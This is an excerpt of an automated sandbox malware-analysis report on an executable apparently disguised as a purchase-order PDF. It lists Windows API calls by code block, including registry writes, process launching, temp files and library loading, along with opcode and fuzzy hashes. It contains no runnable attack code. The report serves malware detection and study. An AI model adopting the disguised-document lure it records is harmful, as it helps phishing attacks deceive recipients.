                                                                                                            • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                            • wsprintfW.USER32 ref: 00404A1A
                                                                                                            • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s
                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                            • Opcode ID: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                            • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                            • Opcode Fuzzy Hash: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                            • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                            • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                            • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                            • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                            • wsprintfW.USER32 ref: 00406411
                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 00406421
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%S.dll
                                                                                                            • API String ID: 2200240437-2744773210
                                                                                                            • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                            • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                            • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                            • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                            • lstrlenW.KERNEL32(0040B5F0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1356686001-0
                                                                                                            • Opcode ID: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                            • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                            • Opcode Fuzzy Hash: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                            • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668
                                                                                                            APIs
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                              • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                              • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                              • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                              • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 3585118688-0
                                                                                                            • Opcode ID: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                            • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                            • Opcode Fuzzy Hash: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                            • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNEL32(?,0040A300,00441800), ref: 004056C6
                                                                                                            • GetLastError.KERNEL32 ref: 004056DA
                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                            • GetLastError.KERNEL32 ref: 004056F9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                            • String ID:
                                                                                                            • API String ID: 3449924974-0
                                                                                                            • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                            • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                            • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                            • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                            • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 2102729457-0
                                                                                                            • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                            • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                            • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                            • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                              • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                            • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                            • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                            • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                            • GetTempFileNameW.KERNEL32(0040A300,?,00000000,?,?,?,00000000,0040329E,00441000,00441800,00441800,00441800,00441800,00441800,00441800,004034CC), ref: 00405C92
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: nsa
                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                            • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                            • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                            • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                            • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                            • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 00405748
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                            • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                            • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                            • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                            • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                            • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                            • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9